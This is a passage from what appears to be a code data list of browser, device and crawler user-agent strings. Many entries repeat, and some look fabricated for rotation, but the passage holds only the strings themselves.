'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) 
AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) 
Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; 
rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; 
ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! 
